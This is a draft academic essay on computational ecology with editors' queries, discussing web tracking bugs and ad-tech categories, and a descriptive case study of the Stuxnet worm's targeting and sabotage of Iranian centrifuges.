&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2010)]] &amp;lt;br&amp;gt; ''Image 1: Display Advertising Technology Landscape (Luma, 2010)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Of course, one element missing from this typology is that of surveillance, and indeed it is no surprise that web bugs perform part of the tracking technologies used by companies to monitor staff. For example, in 2006 Hewlett Packard used web bugs from [http://readnotify.com/ readnotify.com] to trace insider leaks to the journalist Dawn Kawamoto and later confirmed in testimony to a U.S. House of Representatives subcommittee that it's ‘still company practice to use e-mail bugs in certain cases’ (Evers, 2006; Fried, 2006). &lt;br /&gt;
&lt;br /&gt;
As can be seen, this is an extremely textured environment that currently offers little in terms of diagnosis or even warnings to the user. The industry itself, which prefers the term “clear GIF” to web bug, is certainly keen to avoid regulation and keeps itself very much to itself in order to avoid raising too much unwarranted attention. Some of the current discussions over the direction of regulation on this issue have focused on the “do not track” flag, which would signal a user's opt-out preference within an HTTP header. Unfortunately, very few companies respect the &amp;quot;do not track&amp;quot; header and there is currently no legal requirement that they do so in the US, or elsewhere (W3C, 2012). Although one can see in this context the current debate over the EU ePrivacy Directive, where the Article 29 Working Party (A29 WP) has stated that ‘voluntary plans drawn up by Europe's digital advertising industry representatives, the European Advertising Standards Alliance (EASA) and IAB Europe, do not meet the consent and information requirements of the recently revised ePrivacy Directive’ (Baker, 2012). [Eds: would this final point be better in a footnote?]&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
One of the newer, and perhaps indicative directions of travel of these new web bugs under development is called [http://www.persianstat.ir/ PersianStat], which claims to keep 'an eye on 1091622 websites': an Iranian web tracking and data analytics website it shows that this new code ecology is not purely a Western phenomenon. With the greater use of computational networked devices in everyday life, from mobile phones to GPS systems, these forms of tracking systems will only become more invasive and aggressive in collecting data from our everyday life and encounters. Indeed, it is unsurprising to find that Americans, for example, are not comfortable with the growth in use of these tracker technologies. Pew (2012) found: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;that 73 percent of&amp;amp;nbsp;Americans said they would 'not be okay' with&amp;amp;nbsp;being tracked (because it would be an invasion&amp;amp;nbsp;of privacy)… Only 23 percent said they'd be 'okay' with&amp;amp;nbsp;tracking (because it would lead to better and&amp;amp;nbsp;more personalized search results)…Despite all those high-percentage objections&amp;amp;nbsp;to the idea of being tracked, less than half of&amp;amp;nbsp;the people surveyed -- 38 percent -- said they&amp;amp;nbsp;knew of ways to control the data collected&amp;amp;nbsp;about them. (Garber, 2012; Pew, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This contradiction between the ability of these computational systems and surfaces to supply a commodity to the user, and the need to raise income through the harvesting of data which is in turn sold to advertisers and marketing companies, shows that this is an unstable situation. It also serves to demonstrate the extent&amp;amp;nbsp;to which users are just not aware of the subterranean depths of their computational devices and the ability&amp;amp;nbsp;of these general computing platforms to disconnect the user interface from the actual intentions or functioning of the device, whilst giving the impression to the user that they remain fully in control of the computer. As Garber observes, ‘underground network, surface illusion… How much do we actually want to know about this stuff? Do we truly want to understand the intricacies of data-collection and personalization and all the behind-the-screen work that creates the easy, breezy experience of search ... or would we, on some level, prefer that it remain as magic?’ (Garber, 2012). An issue helpfully illustrated by the next case study of the Stuxnet virus, which shows the extent to which the magic of software can conceal its true function. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Stuxnet'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Stuxnet[6] is a computer worm which experts now believe was aimed at the Iranian uranium-enrichment facility at Natanz, Iran.[7] The Stuxnet worm, a subclass of computer virus, copied itself repeatedly across computer systems until it found the host that met its ‘strike conditions’, that is, the location it was designed to attack, and activated its ‘digital warhead’, which may monitor, damage, or even destroy its target. The name, ‘Stuxnet,’ is ‘derived from some of the filename/strings in the malware - mrxcls.sys, mrxnet.sys’, the first part, 'stu', comes from the (.stub) file, mrxcls.sys; the second part, 'xnet', comes from mrxnet.sys (Kruszelnicki, 2011; mmpc2, 2010). Due to the sophistication of the programming involved, this worm is considered to have reached a new level in cyberwarfare. Stuxnet has been called the first 'weaponized' computer virus, and it would have required huge resources, like a test facility to model a nuclear plant, to create and launch it (Cherry, 2010). As Liam O Murchu, an operations manager for Symantec, explained: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Unlike the millions of worms and viruses that turn up on the Internet every year, this one was not trying to steal passwords, identities or money. Stuxnet appeared to be crawling around the world, computer by computer, looking for some sort of industrial operation that was using a specific piece of equipment, a Siemens S7-300 programmable logic controller. (60 Minutes, 2012b).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;The Stuxnet worm works by undertaking a very complex stealth infection and covers its tracks by recording data from the nuclear processing system which it then plays back to the operators to disguise that it is actually gently causing the centifuges to fail. This is known as a ‘man-in-the-middle attack’ because it fakes industrial process control sensor signals so an infected system does not exhibit abnormal behavior and therefore raise alarm. Again, cleverly, the faults it creates in the plant are likely to occur weeks after the sabotaged effort, and in a targeted way, through the fatiguing of the motors – this looks like a standard failure rather than an attack. Indeed, Iran later confirmed that a number of its centrifuges had been affected by an attack (CBS News, 2010).&amp;amp;nbsp;A ‘senior Iranian intelligence official said an estimated 16,000 computers were infected by the Stuxnet virus’ (Assocated Press, 2012). The Stuxnet worm is also interesting because it has built-in ''sunset code'' that causes the worm to erase itself after 24 June, 2012, and hence hide its tracks. As Zetter explains: &lt;br /&gt;
&amp;lt;blockquote&amp;gt;once the code infects a system, it searches for the presence of two kinds of frequency converters made by the Iranian firm Fararo Paya and the Finnish company Vacon, making it clear that the code has a precise target in its sights… Stuxnet begins with a nominal frequency of 1,064 Hz… then reduces the frequency for a short while before returning it back to 1,064 Hz… Stuxnet [then] instructs the speed to increase to 1,410 Hz, which is 'very close to the maximum speed the spinning aluminum IR-1 rotor can withstand mechanically',… [but] before the rotor reaches the tangential speed at which it would break apart… within 15 minutes after instructing the frequency to increase, Stuxnet returns the frequency to its nominal 1,064 Hz level. Nothing else happens for 27 days, at which point a second attack sequence kicks in that reduces the frequency to 2 Hz, which lasts for 50 minutes before the frequency is restored to 1,064 Hz. Another 27 days pass, and the first attack sequence launches again, increasing the frequency to 1,410 Hz, followed 27 days later by a reduction to 2 Hz. (Zetter, 2011)&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Stuxnet disguises all of this activity by overriding the data control systems and sending commands to disable warning and safety controls that would normally alert plant operators to these dangerous frequency changes. Stuxnet is intriguing because it is not a general purpose attack, but designed to unload its digital warheads under specific conditions against a specific threat target. It is also remarkable in the way in which it disengages the interface, the screen for the user, from the underlying logic and performance of the machine. &lt;br /&gt;
&lt;br /&gt;
Indeed, there has been a great deal of speculation about whether a state would have been required to develop it due to the complexities involved in being able to test such a worm before releasing it into the wild (Markoff and Sanger, 2010). Richard Clarke, the former chief of counter-terrorism under Presidents Clinton and Bush, argues that the built-in fail-safes are an important clue to Stuxnet’s source and that they point to the kinds of procedures found in a Western government. He says, ‘If a [Western] government were going to do something like this…then it would have to go through a bureaucracy, a clearance process, [and] somewhere along the line, lawyers would say, “We have to prevent collateral damage,” and the programmers would go back and add features that normally you don’t see in the hacks. And there are several of them in Stuxnet’ (Gross, 2011). Indeed, the complexities and structure of the worm are such that at least thirty people would have been working on it simultaneously in order to build a worm of this kind (Zetter, 2010). This is especially true of a worm that launched a so-called ‘zero-day attack’, that is, using a set of techniques that are not public nor known by the developer of the attacked system, in this case Microsoft and Siemens. In actuality it was remarkable for exploiting four different zero-day vulnerabilities (Gross, 2011). Because of the layered approach to its attack and the detailed knowledge required of Microsoft Windows, SCADA (Supervisory Control And Data Acquisition) and PLCs (Programmable Logic Controllers) systems, this would have been a very large project to develop and launch. Indeed, Eric Byres, chief technology officer for Byres Security, has stated: ‘we’re talking man-months, if not years, of coding to make it work the way it did' (quoted in Zetter, 2010). &lt;br /&gt;
&lt;br /&gt;
The two chief capabilities of Stuxnet are: (1) to identify its target precisely using a number of software based markers that give the physical identity of the location away. Indeed, ‘attackers [had] full, and I mean this literally, full tactical knowledge of every damn detail of [the Natanz] plant’ (60 Minutes, 2012b); and (2) the capability to disengage control systems from physical systems and to provide a stealth infection into the computer system that would fool the operators of the plant (also known as a ‘man-in-the-middle attack’). This was achieved through the use of two ‘digital warheads’, called 417 and 315. The smaller, 315, was designed to slowly reduce the speed of rotors leading to cracks and failures, and the second larger warhead, 417, manipulated valves in the centrifuge and faking industrial process control sensor signals by modeling the centifuges which were grouped into 164 cascades (Langner, 2011). Indeed, Langner (2011) described this evocatively as ‘two shooters from different angles’. The Stuxnet worm was launched some time in 2009/2010 and shortly afterwards:[8] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;the all-important centrifuges at Iran's nuclear fuel enrichment facility at Natanz began failing at a suspicious rate. Iran eventually admitted that computer code created problems for their centrifuges, but downplayed any lasting damage. Computer security experts now agree that code was a sophisticated computer worm dubbed Stuxnet, and that it destroyed more than 1,000 centrifuges. (60 Minutes, 2012a)&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; The origin of the name Stuxnet is hypothesized from an analysis of the approximately 15,000 lines of programming code. This [Eds: what does 'this' here refer to? Can it be clarified so this sentences reads better] was a close reading and reconstruction of the programming logic by taking the machine code, disassembling it and then attempting to convert it into the C programming language. The code could then be analysed for system function calls, timers, and data structures, in order to try to understand what the code was doing (Langner, 2011). Indeed, as part of this process a reference to 'Myrtus' was discovered, and the link made to 'Myrtus as an allusion to the Hebrew word for Esther. The Book of Esther tells the story of a Persian plot against the Jews, who attacked their enemies pre-emptively' (Markoff and Sanger, 2010).[9] Whilst no actor has claimed responsibility for Stuxnet, there is a strong suspicion that either the United States or Israel had to be involved in the creation of such a sophisticated attack virus. Its attack appears to have been concentrated on a number of selected areas, with Iran at the centre (see table 1).&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:BerryStuxnet.jpg|left|500x450px|Percentage Distribution of Stuxnet Infections by Region (adapted from Matrosov et al n.d.)]] &lt;br /&gt;
&lt;br /&gt;
**Iran -&amp;amp;nbsp;52.2% &lt;br /&gt;
**Indonesia -&amp;amp;nbsp;17.4% &lt;br /&gt;
**India -&amp;amp;nbsp;11.3% &lt;br /&gt;
**Pakistan -&amp;amp;nbsp;3.6% &lt;br /&gt;
**Uzbekistan-&amp;amp;nbsp;2.6% &lt;br /&gt;
**Russia -&amp;amp;nbsp;2.1% &lt;br /&gt;
